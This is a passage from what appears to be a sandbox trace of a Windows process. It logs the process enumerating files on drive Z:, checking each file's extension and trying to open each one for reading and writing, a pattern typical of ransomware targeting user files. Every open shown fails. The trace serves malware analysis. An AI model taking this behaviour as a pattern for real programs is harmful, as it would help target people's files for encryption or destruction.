lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.314] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x112b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I5MGz.gif", cAlternateFileName="")) returned 1 [0177.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.314] PathFindExtensionW (pszPath="Z:\\I5MGz.gif") returned=".gif" [0177.318] CreateFileW (lpFileName="Z:\\I5MGz.gif" (normalized: "z:\\i5mgz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.319] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa877, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rbURuD4ORn2Eem6rs.jpg", cAlternateFileName="")) returned 1 [0177.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.319] PathFindExtensionW (pszPath="Z:\\rbURuD4ORn2Eem6rs.jpg") returned=".jpg" [0177.323] CreateFileW (lpFileName="Z:\\rbURuD4ORn2Eem6rs.jpg" (normalized: "z:\\rburud4orn2eem6rs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.324] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7b24, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VTE95H0m59pDCT9UO1IX.docx", cAlternateFileName="")) returned 1 [0177.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.324] PathFindExtensionW (pszPath="Z:\\VTE95H0m59pDCT9UO1IX.docx") returned=".docx" [0177.328] CreateFileW (lpFileName="Z:\\VTE95H0m59pDCT9UO1IX.docx" (normalized: "z:\\vte95h0m59pdct9uo1ix.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.331] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x96af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HYsyB74UdGWE4jIKpy9E.xlsx", cAlternateFileName="")) returned 1 [0177.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.331] PathFindExtensionW (pszPath="Z:\\HYsyB74UdGWE4jIKpy9E.xlsx") returned=".xlsx" [0177.335] CreateFileW (lpFileName="Z:\\HYsyB74UdGWE4jIKpy9E.xlsx" (normalized: "z:\\hysyb74udgwe4jikpy9e.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.336] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="455kYjCp7KIYqdl.gif", cAlternateFileName="")) returned 1 [0177.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.337] PathFindExtensionW (pszPath="Z:\\455kYjCp7KIYqdl.gif") returned=".gif" [0177.341] CreateFileW (lpFileName="Z:\\455kYjCp7KIYqdl.gif" (normalized: "z:\\455kyjcp7kiyqdl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.343] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbf5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F1p7Wn.swf", cAlternateFileName="")) returned 1 [0177.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.343] PathFindExtensionW (pszPath="Z:\\F1p7Wn.swf") returned=".swf" [0177.347] CreateFileW (lpFileName="Z:\\F1p7Wn.swf" (normalized: "z:\\f1p7wn.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.348] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9039, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SDdqr3L6NGsiR8gSS.png", cAlternateFileName="")) returned 1 [0177.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.348] PathFindExtensionW (pszPath="Z:\\SDdqr3L6NGsiR8gSS.png") returned=".png" [0177.352] CreateFileW (lpFileName="Z:\\SDdqr3L6NGsiR8gSS.png" (normalized: "z:\\sddqr3l6ngsir8gss.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.354] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13821, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eDeo4.wav", cAlternateFileName="")) returned 1 [0177.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.354] PathFindExtensionW (pszPath="Z:\\eDeo4.wav") returned=".wav" [0177.358] CreateFileW (lpFileName="Z:\\eDeo4.wav" (normalized: "z:\\edeo4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.359] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13fca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EYzpuUkMw0nV.m4a", cAlternateFileName="")) returned 1 [0177.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.359] PathFindExtensionW (pszPath="Z:\\EYzpuUkMw0nV.m4a") returned=".m4a" [0177.363] CreateFileW (lpFileName="Z:\\EYzpuUkMw0nV.m4a" (normalized: "z:\\eyzpuukmw0nv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.365] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x742f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D91tIUAsFS.mkv", cAlternateFileName="")) returned 1 [0177.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.365] PathFindExtensionW (pszPath="Z:\\D91tIUAsFS.mkv") returned=".mkv" [0177.369] CreateFileW (lpFileName="Z:\\D91tIUAsFS.mkv" (normalized: "z:\\d91tiuasfs.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.371] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1586e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y4KxErTVQYWoCrSXjxG.odt", cAlternateFileName="")) returned 1 [0177.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.371] PathFindExtensionW (pszPath="Z:\\y4KxErTVQYWoCrSXjxG.odt") returned=".odt" [0177.375] CreateFileW (lpFileName="Z:\\y4KxErTVQYWoCrSXjxG.odt" (normalized: "z:\\y4kxertvqywocrsxjxg.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.376] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x138c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D3bOsFLtbMJgWgQv8Xrs.m4a", cAlternateFileName="")) returned 1 [0177.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.377] PathFindExtensionW (pszPath="Z:\\D3bOsFLtbMJgWgQv8Xrs.m4a") returned=".m4a" [0177.380] CreateFileW (lpFileName="Z:\\D3bOsFLtbMJgWgQv8Xrs.m4a" (normalized: "z:\\d3bosfltbmjgwgqv8xrs.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.382] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc139, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VBDptFA1xz7efpLkn.mp4", cAlternateFileName="")) returned 1 [0177.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.382] PathFindExtensionW (pszPath="Z:\\VBDptFA1xz7efpLkn.mp4") returned=".mp4" [0177.386] CreateFileW (lpFileName="Z:\\VBDptFA1xz7efpLkn.mp4" (normalized: "z:\\vbdptfa1xz7efplkn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.387] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xafe5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JmVSFmaxSYp.wav", cAlternateFileName="")) returned 1 [0177.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.388] PathFindExtensionW (pszPath="Z:\\JmVSFmaxSYp.wav") returned=".wav" [0177.392] CreateFileW (lpFileName="Z:\\JmVSFmaxSYp.wav" (normalized: "z:\\jmvsfmaxsyp.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.393] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15403, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwFhNksqnjKFSaL.doc", cAlternateFileName="")) returned 1 [0177.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.393] PathFindExtensionW (pszPath="Z:\\WwFhNksqnjKFSaL.doc") returned=".doc" [0177.397] CreateFileW (lpFileName="Z:\\WwFhNksqnjKFSaL.doc" (normalized: "z:\\wwfhnksqnjkfsal.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.399] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x18342, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hMbpJsxUxLqdU43X.rtf", cAlternateFileName="")) returned 1 [0177.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.399] PathFindExtensionW (pszPath="Z:\\hMbpJsxUxLqdU43X.rtf") returned=".rtf" [0177.403] CreateFileW (lpFileName="Z:\\hMbpJsxUxLqdU43X.rtf" (normalized: "z:\\hmbpjsxuxlqdu43x.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.404] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7967, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mUs3U.jpg", cAlternateFileName="")) returned 1 [0177.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.404] PathFindExtensionW (pszPath="Z:\\mUs3U.jpg") returned=".jpg" [0177.408] CreateFileW (lpFileName="Z:\\mUs3U.jpg" (normalized: "z:\\mus3u.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.411] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1057a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="noIQIeDYAhP.m4a", cAlternateFileName="")) returned 1 [0177.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.411] PathFindExtensionW (pszPath="Z:\\noIQIeDYAhP.m4a") returned=".m4a" [0177.415] CreateFileW (lpFileName="Z:\\noIQIeDYAhP.m4a" (normalized: "z:\\noiqiedyahp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.416] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V7AkBxJ.rtf", cAlternateFileName="")) returned 1 [0177.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0177.416] PathFindExtensionW (pszPath="Z:\\V7AkBxJ.rtf") returned=".rtf" [0177.420] CreateFileW (lpFileName="Z:\\V7AkBxJ.rtf" (normalized: "z:\\v7akbxj.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0177.421] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12d65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nXMaDbExzV3GNxn.rtf", cAlternateFileName="")) returned 1 [0177.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.421] PathFindExtensionW (pszPath="Z:\\nXMaDbExzV3GNxn.rtf") returned=".rtf" [0177.425] CreateFileW (lpFileName="Z:\\nXMaDbExzV3GNxn.rtf" (normalized: "z:\\nxmadbexzv3gnxn.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.426] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2653c835, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="05sv4vlauTjO82QKoH.odp", cAlternateFileName="")) returned 1 [0177.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0177.426] PathFindExtensionW (pszPath="Z:\\05sv4vlauTjO82QKoH.odp") returned=".odp" [0177.430] CreateFileW (lpFileName="Z:\\05sv4vlauTjO82QKoH.odp" (normalized: "z:\\05sv4vlautjo82qkoh.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0177.431] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x178b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e0Lune6IQDhr.swf", cAlternateFileName="")) returned 1 [0177.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0177.432] PathFindExtensionW (pszPath="Z:\\e0Lune6IQDhr.swf") returned=".swf" [0177.435] CreateFileW (lpFileName="Z:\\e0Lune6IQDhr.swf" (normalized: "z:\\e0lune6iqdhr.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0177.437] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x80, 